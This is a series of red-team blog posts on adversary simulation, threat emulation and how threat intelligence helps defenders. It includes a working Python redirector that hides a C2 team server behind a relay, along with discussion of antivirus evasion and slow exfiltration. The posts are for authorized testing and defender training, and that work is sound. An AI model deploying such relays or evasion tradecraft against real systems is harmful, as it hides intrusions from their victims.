The threat emulation problem is fooling an analyst into believing they’re dealing with a real-world actor during a simulated incident.

There are a lot of approaches to this problem. One approach is to use the actor’s malware when it’s available. Another approach is to dress up a payload to have indicators that are similar to the emulated actor’s malware. This is the approach Cobalt Strike takes with its Malleable C2 technology.

I’ve had an interest in the Threat Emulation problem for a while. Here are a few resources on it:

If you’d like to learn more about Threat Emulation with Cobalt Strike, take a look at Puttering my Panda and Other Threat Replication Case Studies. This blog post shows how to dissect a threat intelligence report and use Cobalt Strike to emulate targeted attacks and indicators from three actors.

If you’d like to learn more about the Threat Emulation problem set, watch 2014’s Hacking to Get Caught. In this talk I discuss what it means to emulate a threat during a red team assessment. I go through approaches other than my own. I then discuss my thoughts on the Threat Emulation problem and potential solutions. This talk pre-dates the release of Malleable C2.

If you’d like thoughts on how Threat Emulation fits into the broader shifts taking place in our industry, watch 2015’s Hacking to Get Caught talk. The content of this talk is different from the 2014 talk. Hacking to Get Caught discusses Adversary Simulations, Cyber Security Exercises, and a trend towards using offensive assets to test and evaluate security operations. I see Threat Emulation as a way to exercise analysis (when that’s the goal). You may also want to look at Raphael’s Magic Quadrant. This blog post summarizes my thoughts on these broad shifts.

Raphael’s Magic Quadrant

BlackHat is about to start in a few days. I think this is an appropriate time to share a non-technical, business-only post.

There is a new market for offensive tools and services. Our trade press doesn’t write about it yet. I don’t believe industry analysts have caught onto these ideas yet. The leaders behind mature security programs have converged on these ideas, in isolation of each other. I see several forward-thinking consulting firms aligning in this direction as well. I also see movement towards these ideas in a variety of sectors. This isn’t limited to banks, the government, or the military.

The Sword that Hones the Shield

Today’s market for penetration testing software and services is driven by a need to find vulnerabilities in a network and build a prioritized list of things to fix to make it safe. The services and tools in this market reflect this problem set.

What happens when an attacker gets in? It happens, even in the most well maintained networks. At this point all is not lost. This is where security operations comes in. This is the part of a security program designed to detect and respond to an intrusion before it becomes a major incident.

Security Operations is a big investment. There is no lack of devices on the market that promise to stop the APT or detect 99.9% of malware that the vendor tested. When a breach happens, in the presence of these devices, the vendor usually claims the customer didn’t use their magical dust correctly. These devices are all very expensive.

Beyond the devices comes the monitoring staff. These are the folks who watch the APT boxes and other sensors to determine if there is malicious activity on their network. Some organizations outsource this to a Managed Security Services Provider. Others have an in-house staff to do this. Either way, this is an on-going cost that organizations pay to protect their business if an intrusion occurs.

Security Operations is not just passive monitoring. At the high end of the market, security operations also involves highly skilled analysts who deploy agents that collect details about user and process behavior that were previously unavailable. These agents generate a lot of data. The collection, processing, and analysis of this data is difficult to do at scale. Because of this, these analysts usually instrument systems and investigate when another form of monitoring tips them off. These highly skilled analysts have the task to find signs of an intrusion, understand it in full, and develop a strategy to delay the actor until they know the best way to remove the actor from their network altogether. This is often called Hunt.

If an organization invests into security operations in any way, they have an obligation to validate that investment and make sure these parts of their security program work. This problem set is the driver behind this new market for offensive services and tools.

Adversary Simulations

The new service I speak of has a number of names. Adversary Simulation is one name. Threat Emulation is another. Red Team-lite is a term my friends and I use to joke about it. The concept is the same. An offensive professional exercises security operations by simulating an adversary’s actions.

In these engagements, how the attacker got in doesn’t matter as much. Every step of the attacker’s process is an opportunity for security operations staff to detect and respond to the intruder. Some engagements might emulate the initial steps an attacker takes after a breach. These initial steps to escalate privileges and take over the domain are worthwhile opportunities to catch an attacker. Other engagements might emulate an attacker who owns the domain and has had a presence on the network for years. The nice thing about this model is each of these engagements are scoped to exercise and train security operations staff on a specific type of incident.

I've written about Adversary Simulations before. I've also spoken about them a few times. My recent updated thoughts were shared at Converge in Detroit a few weeks ago.

Adversary Simulations focus on a different part of the offensive process than most penetration tests. Penetration Tests tend to focus on access with a yelp for joy when shell is gained. Adversary Simulations focus almost entirely on post-exploitation, lateral movement, and persistence.

The tool needs for Adversary Simulations are far different. A novel covert channel matters far more than an unpatched exploit. A common element of Adversary Simulations is a white box assume breach model. Just as often as not, an Adversary Simulation starts with an assumed full domain compromise. The goal of the operator is to use this access to achieve effects and steal data in ways that help exercise and prepare the security operations staff for what they’re really up against.

Adversary Simulation Tools

What tools can you use to perform Adversary Simulations? You can build your own. PowerShell is a common platform to build custom remote access tools on an engagement by engagement basis. Microsoft’s red team follows this approach. One of my favorite talks: No Tools, No Problem: Building a Custom Botnet in PowerShell (Chris Campbell, 2012) goes through this step-by-step.

Cobalt Strike's Beacon has shown itself as an effective Adversary Simulation tool. My initial focus on the needs of high-end red teams and experience with red vs. blue exercises has forced me to evolve a toolset that offers asynchronous post-exploitation and covert communication flexibility. For example, Malleable C2 gives Beacon the flexibility to represent multiple toolsets/actors in one engagement. Beacon operators rely on native tools for most of their post-exploitation tasks. This approach lends itself well to emulating a quiet advanced threat actor. Cobalt Strike 3.0 will double down on this approach.

Immunity has their Innuendo tool. I’ve kept my eye on Innuendo since Immunity’s first announcement. Innuendo is an extensible post-exploitation agent designed to emulate the post-intrusion steps of an advanced adversary with an emphasis on covert channels. Innuendo is as much a post-exploitation development framework as it is a remote access tool. Immunity also offers an Adversary Simulation service. I’m convinced, at this point, that Immunity sees this market in a way that is similar to how I see it.

One of the companies doing a lot to push red team tradecraft into penetration tests is the Veris Group. Will Schroeder has done a lot in the offensive PowerShell space to support the needs of red team operators. The things Will works on don't come from a brainstorming session. They're the hard needs of the engagements he works on. At B-Sides Las Vegas, he and his colleague Justin Warner will release a post-exploitation agent called Empire. This isn't yet-another-powershell post-exploitation agent. It's documented, polished, AND it builds on some novel work to run PowerShell in an unmanaged process. This talk was rejected by other conferences and I believe the conference organizers made a mistake here. Empire is the foundation of a well thought out Adversary Simulation tool.

You'll notice that I talk a lot about the playing field of Adversary Simulation tools today. I think each of these options is a beginning, at best. We as an industry have a long way to go to make professional Adversary Simulations safe, repeatable, and useful for the customers that buy them.

Adversary Simulation Training

The tools for Adversary Simulation are coming. The tools alone are not the story. Adversary Simulations require more than good tools, they require good operators.

A good Adversary Simulation Operator is one who understands system administration concepts very well. Regardless of toolset, many Adversary Simulation tasks are doable with tools built into the operating system.

A good Adversary Simulation Operator is also one who understands what their actions look like to a sensor and appreciates at which points a sensor can observe and alert on their actions. This offense-in-depth mindset is key to evading defenses and executing a challenging scenario.

Finally, Adversary Simulations require an appreciation for Tradecraft that simply isn’t there in the penetration testing community yet. Tradecraft are the best practices of a modern Adversary. What is the adversary’s playbook? What checklists do they follow? Why do they do the things they do?

I see some of my peers dismiss foreign intelligence services as script kiddies, equal to or beneath penetration testers in capability. This makes me cringe. This hubris is not the way forward for effective Adversary Simulations. Adversary Simulations will require professionals with an open mind and an appreciation for other models of offense.

Right now, the best source of information on Tradecraft is the narrative portion of well written and informed Threat Intelligence reports. A good Adversary Simulation Operator will know how to read a good report, speculate about the adversary’s process, and design an operating concept that emulates that process. CrowdStrike’s Adversary Tricks and Treats blog post is an example of a good narrative. Kaspersky’s report on Duqu 2.0 also captures a lot of key details about how the actor does lateral movement and persistence. For example, the actor that operates with Duqu 2.0 uses MSI packages kicked off with schtasks for lateral movement. Why would this quiet advanced actor do this? What’s the benefit to them? A good Adversary Simulation Operator will ask these questions, come to their own conclusions, and figure out how to emulate these actions in their customer’s networks. These steps will help their customers get better at developing mitigations and detection strategies that work.

Adversary Simulations are not Penetration Testing. There’s some overlap in the skills necessary, but it’s smaller than most might think. For Adversary Simulations to really mature as a service, we will need training classes that emphasize post-exploitation, system administration, and how to digest Threat Intelligence reports. Right now, the courses meant for high-end red teams are the best options.

Adversary Simulation Services

Adversary Simulation Services [someone pick a better acronym] are driven by the need to validate and improve Security Operations. This isn’t a mature-organization-only problem. If an organization is mature enough to hire external security consultants for vulnerability assessments AND the organization invests in security operations, they will benefit from some service that validates or enhances this investment.

What makes Adversary Simulation interesting is it’s an opportunity for a consulting firm to specialize and use their strengths.

If you work for a threat intelligence company, Adversary Simulations are your opportunity to use that Threat Intelligence to develop and execute scenarios to validate and improve your customer's use of the Threat Intelligence you sell them. iSight Partners is on the cutting edge of this right now. It's so cutting edge, they haven't even updated their site to describe this service yet. Their concept is similar to how I described an Aggressor at ShowMeCon in May 2014.

If you’re a penetration testing company that focuses on SCADA; you have an opportunity to develop scenarios that match situations unique to your customers and sell them as a service that others outside your niche can’t offer.

Some organizations outsource most of their security operations to a third-party provider. That’s fine. If you work with these organizations, you can still sell services to help your customers validate this investment. Look into MI SEC’s Security Exercise model and come up with scenarios that take one to two days of customer time to execute and give feedback.

If you're an organization on the high end working to build a hunt capability, Adversary Simulation is important to you too. You can't just deploy Hunt Operators and assume they're ready to tackle the scariest APT out there. An Adversary Simulation Team can play as the scrimmage team to train and evaluate your Hunt capability.

For any organization that you work with, an Adversary Simulation is an opportunity to offer them new services to validate their security operations. There are different models for Adversary Simulations. Each of these models is a fit for different organizational maturity levels.

I predict that Adversary Simulations will become the bulk of the Penetration Testing services and tools market in the future. Now’s a good time to help define it.

Models for Red Team Operations

Recently, I had an email from someone asking for a call to discuss different models of red team operations. This gentleman sees his team as a service provider to his parent organization. He wants to make sure his organization sees his team as more than just dangerous folks with the latest tools doing stuff no one understands. This is a fair question.

In this post, I’ll do my best to share different models I see for red team operations. By operations, I mean emulating the activities of a long-term embedded adversary in a network, one that works from a remote location. This ability to gain, maintain, and take action on access over a (potentially) long period of time is a different task from analyzing an application to find flaws or quickly enumerating a large network to identify misconfigurations and unpatched software.

You may ask, what’s the point of emulating a (remote) long-term embedded adversary? Two words: Security Operations. I’m seeing a shift where organizations are leveraging their red assets to validate and improve their ability to detect and respond to intrusions.

With all of that said, let’s go through a few of the different models:

Full Scope Penetration Tests

A full scope penetration test is one where a hired or internal team attempts to gain a foothold into their customer's environment, elevate their rights, and steal data or achieve some desired effect. These engagements mimic the targeted attack process an external actor executes to break into an organization. When a lot of my peers think about red team operations, these assessments are immediately what comes to mind.

Full scope penetration tests provide a data point about the state of a security program, when all aspects are exercised in concert against an outside attacker. Unfortunately, full scope assessments are as much a test of the assessor as they are of the organization that commissioned these tests. They are also expensive and assessors have to cope with restrictions that are not placed onto a real adversary [less time, fewer resources, compliance with the law].

Given time, resources, and competent execution, a full scope engagement can offer valuable insight about how an external actor sees an organization’s posture. These insights can help identify defensive blind spots and other opportunities for improvement. These engagements are also useful to re-educate executives who bought into the hype that their organization is un-hackable. Making this point seems to be a common driver for these assessments.

Long-term Operations

I see several red teams building long-term operations into their services construct. The idea is that no organizational unit exists in isolation of the others. The organizational units that commission engagements from their internal assets are not necessarily the organizational units that are most in need of a look from a professional red team. To deal with these situations, some red teams are receiving carte blanche to gain, elevate, and maintain access to different organizational units over a long period of time. These accesses are sometimes used to seed or benefit future engagements against different organizational units.

Long-term Operations serve another purpose. They allow the red team to work towards the “perfect knowledge” that a long-term embedded adversary would have. This perfect knowledge would include a detailed network map, passwords for key accounts, and knowledge about which users perform which activities that are of value to a representative adversary.

It’s dangerous to require that each red team engagement start from nothing with no prior knowledge of a target’s environment. A long-term embedded adversary with a multi-year presence in a network will achieve something that approximates perfect knowledge.

For some organizations, I’m a fan of this approach and I see several potential benefits to it. The perfect knowledge piece is one benefit, but that is something an organization could white card if they wanted to. There’s another key benefit: our common understanding of long-term offensive operations is weak at best. Maintaining and acting on access over a long period of time requires more than a good persistence script and a few VPS nodes. The organizations that take time to invest in and get good at this approach will find themselves with interesting insights about what it takes to keep and maintain access to their networks. These insights should help the organization make investments into technologies and processes that will create real pain for a long-term embedded actor.

War Games

Several organizations stage red vs. blue war games to train and evaluate network defense staff. These exercises usually take place in a lab environment with multiple blue teams working to defend their representative networks against a professional opposing force. The role of this opposing force is to provide a credible adversary to train participants and keep pressure on them throughout the event.

Each of these events is different due to their different goals. Some events white card the access step completely. Some also white card the perfect knowledge of the long-term embedded adversary. It all depends on the event's training objectives and how the organizers want to use their professional red team assets.

To an outsider, large scale Red vs. Blue events look like a chaotic mess. The outsider isn’t wrong. Red vs. Blue events are a chaotic mess. They’re chaotic because they’re fast paced. Some compress a multi-year attack scenario into an event that spans days or weeks.

There’s value to these events though. These events provide a safe opportunity to exercise processes and team roles in a fast-paced setting. They’re also an opportunity to field immature or new technologies to understand the benefit they can provide. Unlike more structured tests, these events also give blue participants opportunities to observe and adapt to a thinking adversary. Done right, these events encourage full disclosure between red and blue at the end so participants can walk away with an understanding of how their blue TTPs affected the professional adversary.

Threat Scenarios / Cyber Security Exercises / Attack Simulations

Another use for red assets is to help design and execute cyber security exercises to train and assess network defense teams. These exercises usually start with a plausible scenario, a representative or real actor, and a realistic timeline.

The red asset’s job is to generate realistic observable activity for each part of the timeline. The red operator is given every white card they need to execute their observable effect. Each of these carefully executed items becomes a discussion point for later.

These exercises are a great way to validate procedures and train blue operators to use them. Each unique generated activity is also an opportunity to identify procedure and technology gaps in the organization.

While this concept is new-ish to security operations, it's by no means new. NASA has had a concept of an Integrated Training Team led by a Simulation Supervisor since the beginning of the US space program. NASA's lessons learned in this area are a worthwhile study for security professionals. When I think about the emerging job role of the Threat Emulator, I see these folks as the equivalent of NASA's Simulation Supervisors, but for Security Operations.

Who is doing this?

I see several red teams re-organizing themselves to serve their organizations in different ways from before. Established teams with custom tools for long-term operations are trying to retool for engagements that require full disclosure afterwards. Other teams mirror external consulting firms in their services. These teams are now trying to give their leadership a global long-term perspective on their organization's security posture. Day-to-day these teams are working towards the credibility, capability, and skills to bring the benefits of long-term operations to their organization. I see a trend where many internal red teams are expanding their services to benefit their organizations at the tactical and strategic levels. It's an exciting time to be in this area.

References on Adversary Simulations

A friend recently made the statement that my blog posts have so many videos and links that it would take someone a week to go through all of the material. This comment was made in reference to the blog post exploring the Adversary Simulation space. This topic is near and dear to my heart, so I’d like to dissect the links and videos in the post and why I think they’re worthwhile for you to read.

Why do we need Adversary Simulation?

Penetration Testing with Honest-to-Goodness Malware [DarkReading.com]

This commentary by Gunter Ollmann describes penetration testing as a service with some value, but one that does not reflect its origin: emulating the adversary’s techniques. Maybe the advanced adversary uses Nessus from the target’s conference room and we’re both wrong? Who knows. I like this article because it discusses why adversary emulation is important, it makes a fair argument about why pen testing [still valuable] isn’t a substitute for this, and it proposes a solution to the problem.

Purple Teaming for Success [SecureIdeas]

Kevin Johnson and James Jardine took the time to put together a blog post and webcast that describes their take on purple teaming. I’m not a fan of the term purple teaming and I see it as overbroad, but Kevin and James provide good arguments about why new models for red and blue to work together make sense without prescribing a solution that’s more of the same old pen tester stuff.

How do I see Adversary Simulations?

Puttering my Panda and Other Threat Replication Case Studies [Gratuitous Self-link]

As a tool developer, I look at problems like Adversary Simulations and ask what my tools do to support these things. Cobalt Strike has some nifty technologies for Adversary Simulations. It contains several ready-to-use user-driven attacks to get a foothold. It has a phishing tool that will ingest an existing email and repurpose it into an attack. And, it has Malleable C2, a technology that lets you change what its Beacon payload looks like on the wire. You can fool an analyst into thinking they're dealing with another piece of malware. This blog post shows three case studies to reproduce tradecraft and indicators from public reports on advanced persistent threat activity.

Hacking to Get Caught: A Concept for Adversary Replication [Yeah, me me me]

This is a May 2014 talk on the Adversary Replication concept. In this talk, I work to make a case that an Adversary Simulation is Red Teaming guided by Threat Intelligence. The model I proposed is meant to exercise a customer’s process to analyze and attribute an attack. My thoughts have evolved since this talk but I think it’s still worth watching if you’re really interested in this topic.

What are my favorite Adversary Simulation references?

Red Teaming: Using Cutting-Edge Threat Simulation to Harden the Microsoft Enterprise Cloud [Microsoft.com]

This whitepaper was sent to me at 9pm the day before I published my post on Adversary Simulation. It’s awesome! Microsoft describes the same concept in their own words. Key to their approach is what they call an innovative “Assume Breach” strategy. Of everything I reference in this post, I consider this paper the most important. I recommend that you go read it.

Threat Models that Exercise Your SIEM and Incident Response [Nick Jacob]

This talk describes how to build a threat model and derive from it a storyboard for a quarterly cyber security exercise. Nick goes into the nitty gritty of how they work to provide the observables that support this sequence of events and give analysts something meaningful to chase. He digs into metrics as well.

Seeing Purple: Hybrid Security Teams for the Enterprise [Mark Kikta]

This is another talk from an MISEC member that discusses the periodic cyber security exercise and how to support it. I think Mark, Nick, and Wolfgang are dead-on with their insights, and if I had a magic wand, everyone who works in this space would watch these talks.

Indecent (Penetration Testing) Proposal

A customer reaches out to you. They’ve spent the money. They have a network defense team that innovates and actively hunts for adversary activity. They own the different blinky boxes. They have a highly-rated endpoint protection product in their environment. They’re worried about the cyber attacks they see in the news. Despite this investment, they don’t know how well it works. The CEO thinks they’re invincible. The CISO has his doubts, and the authority and resources to act on these doubts. They want to know where their program stands. They call you.

You run through the options. You dismiss the idea of looking at their vulnerability management program. They have this, and they receive penetration testers on a semi-regular basis. They’re comfortable that someone’s looking at their attack surface. They’re still worried. What about something very targeted? What if someone finds a way in that they, and the myriad of vendors they’ve worked with, didn’t know about?

After discussion, you get to the heart of it. They want to know how effective their network defense team is at detecting and mitigating a successful breach. The gears start to turn in your mind. You know this isn’t the time to use netcat to simulate exfiltration of data. You could download some known malicious software and run it. Or, better, you could go to one of the underground forums and pay $20 for one of the offensive showpieces available for sale. Your mind quickly flashes to a what-if scenario: what happens if you go this way and introduce a backdoor into your customer’s environment? You shake your head and promise yourself that you will look at other options later.

Wisely, you ask a few clarifying questions. What type of breach are they worried about? Of the recent high-profile breaches, what’s the one that makes them think, “could that be us?” Before you know it, you’re on a plane to New York with a diverse team. You bring an offensive expert from your team; she is a cross between operator and developer. You also bring a new hire who used to work as a cyber threat analyst within the US intelligence community. You engage with the customer’s team, which includes trusted agents from the network defense team who will not tell their peers about the upcoming engagement. The meeting is spent productively developing a threat model and a timeline for a hypothetical breach.

Your customer introduces you to another player in this engagement. Your customer pays for analyst services from a well-known threat intelligence company. This company is known for working intrusion response for high-profile breaches. A lesser-known service is the strategic guidance, analysis support, and reports they provide their customers on a subscription basis. This analyst briefs you on a real actor with the capability and intent to target a company like your customer. The hypothetical breach scenario you made with your customer is amenable to this actor’s process. The analyst briefs your team on this actor’s capabilities and unique ways of doing business. Your customer doesn’t know exactly what they want here, but they ask that, if there’s a way to use this information to make your activity more realistic, you do so.

You and your team leave the customer’s site and discuss the day’s meetings with fresh energy. The customer wants to hire you to play out that hypothetical breach in their environment, but they want to do it in a cost-effective way. A trusted insider will assist you with the initial access. It’s up to you to evade their blinky boxes and to work slowly. Paradoxically, the customer wants you to work slowly, but they want to put a time limit on the activity as well. They’re confident that, with unlimited time, you could log the right keystrokes and locate the key resources and systems in their network. To keep the engagement tractable, they offer to assign a trusted agent to your team. This agent will white card information to allow you to move forward with the breach storyline.

The customer’s interest is the hypothetical breach and the timeline of your activity. They don’t expect their network defense team to catch every step. But, they want to know every step you took. After the engagement, they plan to analyze everything you did and look at their process and tools. They’ll ask the tough questions. How did they do? What did they see, but dismiss as benign? What didn’t they see and why? Sometimes it’s acceptable that an activity is too far below a noise threshold to catch. That’s OK. But, sometimes, there’s a detection or action opportunity they miss. It’s important to identify these and look at how to do better next time.

You look at this tall order. It’s a lot. This isn’t something your team normally does. You know you can’t just go in and execute. Your new hire with the intel background smiles. This is a big opportunity. Your developer and analyst work together to make a plan to meet the customer’s needs. Your intent is to execute the breach timeline but introduce tradecraft of the actor the threat intelligence company briefed you on. These few tricks you plan to borrow from the actor will show the customer’s team something they haven’t seen before. It will make for a good debrief later.

This engagement will require some upfront investment from your team and it may require a little retooling. You’ll need to analyze each piece of your kit and make sure it can work within the constraints of your customer’s defensive posture. You verify that you have artifacts that don’t trigger their anti-virus product. Some of the cloud anti-virus products have made trouble for your team in the past. You look at your remote access tool options. You need a payload that’s invisible to the blinky boxes and their automatic detection. If you get caught, you want to know that ingenuity and analysis made it happen. You won’t give yourself up easily. At least, not in the beginning.

You also want to know that you can operate slowly. Your favorite penetration testing tools aren’t built for this. Big questions come up. How will you exfiltrate gigabytes of data, slowly and without raising alarms? You know you’ll need to build something or buy it. You also work to plan the infrastructure you’ll need to support each phase of the breach timeline. You know, for this particular engagement, it makes no sense to have all compromised systems call home to the one Kali box your company keeps in a DMZ.

As all of this planning takes place, you pause and reflect. You got into this business to make your customers better. You built a team and you convinced your management to pay them what they’re worth. You carry the weight of making sure that team is constantly engaged. Sometimes this means taking the less sexy work. Unfortunately, your competitors are in a race to the bottom. Everyone sells the same scans and vulnerability verification as penetration tests. It keeps getting worse. You know you’ll lose your best people if you try to compete this way. This engagement brings new energy to your team.

This mature customer is willing to pay for this service. The value to them is clear. They want to know how well their security operations stand up to a real-world attack. They understand that this is a task that requires expertise. They’ll pay, but they can’t and won’t pay for a long timeline. The white carding is the compromise.

You’re excited. This is something that will use the expertise you’ve collected into a cohesive team. Your customer appreciates how real the threat is. You make plans. Big plans. You wonder who else might pay for this service. You go to your sales person and brief them on the customer and this engagement. Your sales person nods in agreement. “Yes, I see it too”.

When You Know Your Enemy

TL;DR This is my opinion on Threat Intelligence: Automated Defense using Threat Intelligence feeds is (probably) rebranded anti-virus. Threat Intelligence offers benefit when used to hunt for or design mitigations to defeat advanced adversaries. Blue teams that act on this knowledge have an advantage over that adversary and others that use similar tactics.

Threat Intelligence is one of those topics you either love to scoff at or embrace. In this post, I’ll share my hopes, dreams, and aspirations for the budding discipline of Threat Intelligence.

I define Threat Intelligence as actionable adversary-specific information to help you defend your network. There are several firms that sell threat intelligence. Each of these firms tracks, collects on, and produces reports and raw indicator information for multiple actors. What’s in these reports and how these companies collect their information depends on the company and the means and relationships at their disposal.

How best to get value from Threat Intelligence is up for debate, and there are many theories and products that aim to answer this question. The competing ideas surround what counts as actionable information and how you should use it.

Anti-virus Reborn as… Anti-virus

One theory for Threat Intelligence is to provide a feed with IP addresses, domain names, and file hashes for known bad activity. Customers subscribe to this feed, their network defense tools ingest it, and now their network is automatically safe from any actor that the Threat Intelligence provider reports on. Many technical experts scoff at this, and not without reason. This is not far off from the anti-virus model.

The above theory is NOT why I care about Threat Intelligence. My interest is driven by my admittedly skewed offensive experiences. Let me put you into my shoes for a moment…

I build hacking tools for a living. These tools get a lot of use at different Cyber Defense Exercises. Year after year, I see repeat defenders and new defenders. For some defenders, Cobalt Strike is part of their threat model. These teams know they need to defend against Cobalt Strike capability. They also know they need to defend against the Metasploit Framework, Dark Comet, and other common tools too. These tools are known. I am quick to embrace and promote alternate capabilities for this exact reason. Diversity is good for offense.

I have to live with defenders that have access to my tools. This forces me to come up with ways for my power users and me to stay ahead of smart defenders. It’s a fun game and it forces my tools to get better.

The low-hanging fruit of Threat Intelligence makes little sense to me. As an attacker, I can change my IP addresses easily enough. I stand up core infrastructure, somewhere on the internet, and I use redirectors to protect my infrastructure’s location from network defenders. Redirectors are bounce servers that sit between my infrastructure and the target’s network. I also have no problem changing my hashes or the process I use to generate my executable and DLL artifacts. Cobalt Strike has well-thought-out workflows for this.
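To make the redirector idea concrete, here is a minimal sketch: a dumb TCP relay in Python that listens where the payload calls home and forwards bytes to the real team server. Every address here is hypothetical; in practice a redirector is often just a cheap VPS running socat or a couple of firewall rules, not custom code.

    # redirector.py - minimal sketch of a "bounce server" (hypothetical addresses)
    import socket
    import threading

    LISTEN_PORT = 443
    TEAM_SERVER = ("10.0.0.5", 443)  # placeholder for the hidden core infrastructure

    def pipe(src, dst):
        # copy bytes one way until either side closes
        try:
            while True:
                data = src.recv(4096)
                if not data:
                    break
                dst.sendall(data)
        finally:
            src.close()
            dst.close()

    def main():
        server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        server.bind(("0.0.0.0", LISTEN_PORT))
        server.listen(5)
        while True:
            client, _ = server.accept()
            upstream = socket.create_connection(TEAM_SERVER)
            # relay both directions; the target only ever sees this box's address
            threading.Thread(target=pipe, args=(client, upstream), daemon=True).start()
            threading.Thread(target=pipe, args=(upstream, client), daemon=True).start()

    if __name__ == "__main__":
        main()

If defenders burn the relay’s IP address, the attacker stands up another one and the core infrastructure never surfaces. That’s why an IP address is such a cheap indicator to deny.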

I worry about the things that are harder to change.

Why is notepad.exe connecting to the Internet?

Each blue team will latch on to their favorite indicators. I remember one year many blue teams spoke of the notepad.exe malware. They would communicate with each other about the tendency for red team payloads to inject themselves into notepad.exe. This is a lazy indicator, originating from the Metasploit Framework and older versions of Cobalt Strike. It’s something a red operator can change, but few bother to do so. I would expect to see this type of indicator in the technical section of a Threat Intelligence report. This information would help a blue team get ahead of the red teams I worked with that year.

If you’d like to see how this is done, I recommend that you read J.J. Guy’s case study on how to use Carbon Black to investigate this type of indicator.
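If you want to experiment with this hunt yourself, here is a rough sketch using the third-party psutil package. The list of suspect binaries is illustrative only; a real hunt team would build its own baseline of processes that should never talk to the network.

    # hunt.py - sketch: flag "quiet" binaries that hold network connections
    # (requires: pip install psutil; process names below are illustrative)
    import psutil

    SUSPECT_HOSTS = {"notepad.exe", "calc.exe", "mspaint.exe"}

    for proc in psutil.process_iter(["pid", "name"]):
        try:
            name = (proc.info["name"] or "").lower()
            if name in SUSPECT_HOSTS:
                for conn in proc.connections(kind="inet"):
                    if conn.raddr:  # has a remote endpoint
                        print(f"{name} (pid {proc.info['pid']}) -> "
                              f"{conn.raddr.ip}:{conn.raddr.port}")
        except (psutil.AccessDenied, psutil.NoSuchProcess):
            continue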

Several blue teams worry about Cobalt Strike and its Beacon payload. This is my capability to replicate an advanced adversary. These teams download the trial and pick apart my tool to find indicators that they can use to find Beacon. These teams know they can’t predict my IP addresses, which attack I will use, or what file I will touch disk with. There are other ways to spot or mitigate an attacker’s favorite techniques.

DNS Command and Control

One place you can bring hurt to an attacker is their command and control. If you understand how they communicate, you can design mitigations to break this, or at least spot their activity with the fixed indicators in their communication. One of my favorite stories involves DNS.

Cobalt Strike has had a robust DNS communication capability since 2013. It’s had DNS beaconing since late 2012. This year, several repeat blue teams had strategies to find or defeat DNS C2. One team took my trial and figured out that parts of my DNS communication scheme were case sensitive. They modified their DNS server to randomly change the casing of all DNS replies and break my communication scheme.
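The trick works because DNS names are case-insensitive by specification, so a resolver may legally flip the case of a name in its reply (the same property behind the 0x20 anti-spoofing technique). Legitimate clients don’t notice; a C2 parser that treats the name as case-sensitive data breaks. A toy sketch of the mangling, with a made-up Beacon-style query:

    # dns_case.py - sketch of case-randomizing a DNS name in a reply
    import random

    def randomize_case(name: str) -> str:
        return "".join(c.upper() if random.random() < 0.5 else c.lower()
                       for c in name)

    query = "aaa.0123abcdef.c2.example.com"  # hypothetical C2 query
    print(randomize_case(query))  # e.g. aAa.0123ABcdEf.c2.ExAmPle.CoM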

This helped them mitigate red team activity longer than other blue teams. This is another example where information about your adversary can help. If you know there’s a critical weakness in your adversary’s toolchain, use that weakness to protect your network against it. This is not much different from spoofing a mutex value or changing a registry option to inoculate a network against a piece of malware.

This story doesn’t end there though. This team fixated on DNS and they saw it as the red team’s silver bullet. Once we proved we could use DNS, we put our efforts towards defeating the proxy restrictions each team had in place. We were eventually able to defeat this team’s proxy and we had another channel to work in their network. We used outbound HTTP requests through their restrictive proxy server to control a host and pivot to others. They were still watching for us over DNS. The lesson? Even though your Threat Intelligence offers an estimate of an adversary’s capability, don’t neglect the basics, and don’t assume that’s the way they will always hit you. A good adversary will adapt.

To Seek Out New Malware in New Processes…

After a National CCDC event, a student team revealed that they would go through each process and look for WinINet artifacts to hunt Beacon. This is beautiful on so many levels. I build technologies, like Malleable C2, to allow a red operator to customize their indicators and give my payload life, even when the payload is known by those who defend against it. This blue team came up with a non-changing indicator in my payload’s behavior. Fixed malware behavior or artifacts in memory are things a Threat Intelligence company can provide a client’s hunt team. These are tools to find the adversary.

It’s (not) always about the Malware

The red teams I work with quickly judge which teams are hard and which teams are not. We adjust our tradecraft to give harder teams a better challenge. There are a few ways we’ll do this.

Sometimes I know I can’t put malware on key servers. When this happens, I’ll try to live on the systems the defenders neglect. I then use configuration backdoors and trust relationships to keep access to the servers that are well protected. When I need to, I’ll use RDP or some other built-in tool to work with the well protected server. In this way, I get what I need without alerting the blue team to my activity. Malware on a target is not a requirement for an attacker to accomplish their goal.

CrowdStrike tracks an actor they call DEEP PANDA. This actor uses very similar tradecraft. If a blue team knew my favored tradecraft and tricks in these situations, they could instrument their tools and scripts to look for my behavior.

A few points…

You may say, that’s one adversary. What about the others? There are several ways to accomplish offensive tasks and each technique has its limitations (e.g., DNS as a channel). If you mitigate or detect a tactic, you’ll likely affect or find other adversaries that use that tactic too. If an adversary comes up with something novel and uses it in the wild, Threat Intelligence is a way to find out about it, and stay ahead of advancing adversary tradecraft. Why not let the adversary’s offensive research work for you?

You may also argue that your organization is still working on the basics. They’re not ready for this. I understand. These concepts are not for every organization. If you have a mature intrusion response capability, these are ideas about how Threat Intelligence can make it better. These concepts are a complement to, not a replacement for, the other best practices in network defense.

And…

You’ll notice that I speak favorably of Threat Intelligence and its possibilities. I read the glossy marketing reports these vendors release to tease their services. The information in the good reports isn’t far off from the information blue teams use to understand and get an edge in different Cyber Defense Exercises.

In each of these stories, you’ll notice a common theme. The red team is in the network or will get in the network (Assume Compromise!). Knowledge of the red actor’s tools AND tradecraft helps the blue teams get an advantage. These teams use their adversary knowledge in one of two ways: they either design a mitigation against that tactic or they hunt for the red team’s activity. When I look at Threat Intelligence, I see the most value when it aids a thinking blue operator in this way. As a red operator, this is where I’ve seen the most challenge.

Further Reading

  • Take a look at The Pyramid of Pain by David Bianco. This post discusses indicators in terms of things you deny the adversary. If you deny the adversary an IP address, you force them to take a routine action. If you deny the adversary use of a tool, you cause them a great deal of pain. David’s post is very much in the spirit of this one. Thanks to J.J. Guy for the link.

Adversary Simulation Becomes a Thing…

There is a growing chorus of folks talking about simulating targeted attacks from known adversaries as a valuable security service.

The argument goes like this: penetration testers are vulnerability focused and have a toolset and style that replicate, well, a penetration tester. This style finds security problems and it helps, but it does little to prepare the customer for the targeted attacks they will experience.

Adversary simulation is different. It focuses on the customer’s ability to deal with an attack, post-compromise. These assessments look at incident response and provide a valuable “live fire” training opportunity for the analysts who hunt for and respond to incidents each day.

